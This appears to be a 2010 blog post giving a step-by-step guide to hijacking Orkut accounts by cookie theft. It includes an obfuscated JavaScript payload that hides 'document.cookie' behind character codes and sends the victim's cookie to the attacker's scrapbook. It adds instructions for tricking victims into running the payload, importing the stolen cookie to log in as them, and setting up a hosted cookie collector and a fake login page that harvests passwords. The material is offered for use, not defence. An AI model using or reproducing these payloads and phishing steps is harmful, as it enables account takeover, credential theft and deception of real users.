Wednesday, November 3, 2010

Orkut Cookie Stealer Method (Hack Orkut ID's)

1]what are cookies?

A:-Cookies are text messages/files given to a web browser by web servers. The main purpose of a cookie is to identify users and possibly prepare customized webpage or to save site logins information for you. When you enter a web site using cookies, you may be asked to fill out a form providing such information as your name;
email address etc. This information is packaged into a cookie and sent to your web browser, which store it for your later use.The next time you go to the same web site,your browser will send the cookie to the web server.This message is then sent back to the server each time the browser requests the page from the server.

A web server has no memory so the hosted website you are visiting transfers a cookie file of the browser stores on your computers hard disk so that the web site can remember who you are and your preferences.This message exchange allows the web servers to use this information to present you with customized Web pages

Types of Cookies:

[a]session cookie:
Its also called a transient cookie.Its a cookie that is erased when you close the Web browser.The sessional cookies are stored in temporary memory and are not retained after the browser is closed. cookies do not collect the information on your computers. They typically will store information in the forms of the session identification that does not personally identify the user.

[b]persistent cookie:
Its also called a permanent cookie or cookie, a cookie that is stored on your hard drive until it expires (persistent cookies are set with expiration dates)or until you delete a cookie.Persistent cookies are used to collect the information for identifying information about the user,such as Websurfing behaviors/preferences for the specific Web site.

Orkut cookie stealing script


2]Add and edit cookie addon[cookie editor]:-


1]First of all make a fake account for better understanding .Now we will hack the fake profile from the real profile.
2]You will need GID of fake profile/victim profile so use the following cookie stealing script.
3]In order to get the GID,Go to your fake account/victims homepage and paste this script in the address bar and hit enter You will see the gid in the box.



Other ways to find GID:
Method 2
->Go to any profile
->Right click and select view page source
->Now press Ctrl+F[Find] and type in it "background-image"
->It will point out to this line which resembles the below line
background-image: url(;

The red part is your Gid

Method 3

Go to victims home page/ fake profile and then right click on display picture and choose copy image location.You will then get the a URL given below which exactly resembles the one you got

The red part is your Gid

Now suppose your GID is 2541021 then your cookie stealing script will be like this

Code:java script:orkut=replyForm;orkut.toUserId.value=2541021;orkut.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));orkut.action=Scrapbook.aspx?Action.submit;orkut.submit();i=0;a=document.links;setInterval(i++;a[i %document.links.length].style.color=c[i%c.length],10);void(0);
Now as you can see those numbers in the script? Let's see what they mean as per the ANSCII codes:

9 9, C
4 6, .
9 9, C

Still remember the example from my above post, this is how you read the content of a cookie: vartheCookie=""+document.cookie;

eval() is a function, which will execute represented by the string,which is in this case masked behind the numbers.

Quite clever, but the first time I have seen tricks like this. I can already imagine how the orkut solved the first problem previously.They just forbid the string "document.cookie" in users code which solved the problem at first,but obviously that doesn't solve this issue.

So again, this is not a bug within Firefox, that it is a normal Javascript code and Firefox executes it just as the way it is expected to be executed.

If there is a security bug somewhere in ., it is either in the specifications of the Javascript or at the orkut website.

Ok now 

Scrap this to victim and tell him/her to run it in the address bar, as soon as he/she runs the script you will get a cookie info into your fake account.

Now go to the fake account and copy the cookie from "ORKUTPREF=ID=.."onwards till end.
The victim's cookie which will come to your Scrapbook will look like this.
__utmz=85cn=(direct)|utmcsr=(direct)|utmcmd=(none); orkut_state=ORKUTPREF=ID=407231863351044LNG=UI6qeIbfO5hrrk=:; TZ=-330; __utma=575.1909575

Now go to
Tools>>cookie editor>> See the orkut+state Id and click on edit

Go to Tools-->Cookies Editor ---> select Add

Fill Name : orkut_state

Contents : Fill in the cookies here

Host :

Then click save
Paste the whole cookie you copied, in the content.Click on save and close it.Just refresh it.Now you will be in victims account.You can notice that you have logged in victims id after you click on refresh.

Other ways to obtain cookies:

1]Using Cookie Monster 

You can also use a cookie monster and make the ultimate cookie exploit to hack OrkutLets start and Make the ultimate cookie exploit to hack Orkut

1.Go to . Make a free Hosting account .

2.It will mail you all the details as ftp / My Sql username and password

3. Download Install.php from here

4. Upload this file on the server and run .

5 . It will Open as : a Installer

6. Fill the Coloums :

Database : its something like username_name

For this go to mysql and make a database there .

Password : Your Password

User : sent to u by mail

Table : Give any name in this column

Server : This is found in mysql

Admin Password : Provide a pass to access admin area

Once you are done select Submit .

7. Next page in the end show u some links get the 4th link


Replace My link wid urs in the above javascript.

9. Done send it to your victim when victim runs this his cookies gets stolen

10. Receiving cookies open admin area it asks for the pass login with the pass you provided during installation.

2]Using Cookie Stealer In Fake Page

Use This Run.php File In Fake Page

And The Cookie And Login Details Will BE Saved In ld.txt

Copy the whole source code of the Login Page Of Orkut.Paste In Notepad

Search for "" in the fake login page and Replace with Run.php

And Change Method From File to get the Login details

Now Upload This two files to x10hosting server as its best

and send the link to victim

His Cookie And Login Details Will Saved In

means in ld.txt

Upload google_transperant.gif also which u can save from login page ///

For Fake login pages Download This

Now Just Upload This 3 files in your account of x10hosting

Now Send This type of link to victim

ok when he will do login in this page u will get the details means cookie and login detail (username and password)

in this file

Enjoy !!!

Note:You can only login into others accounts using the cookies.You can't change the password/perform transfer of ownership of communities on orkut because they require old password to do so.

For more information plz refer to the following topics in the community
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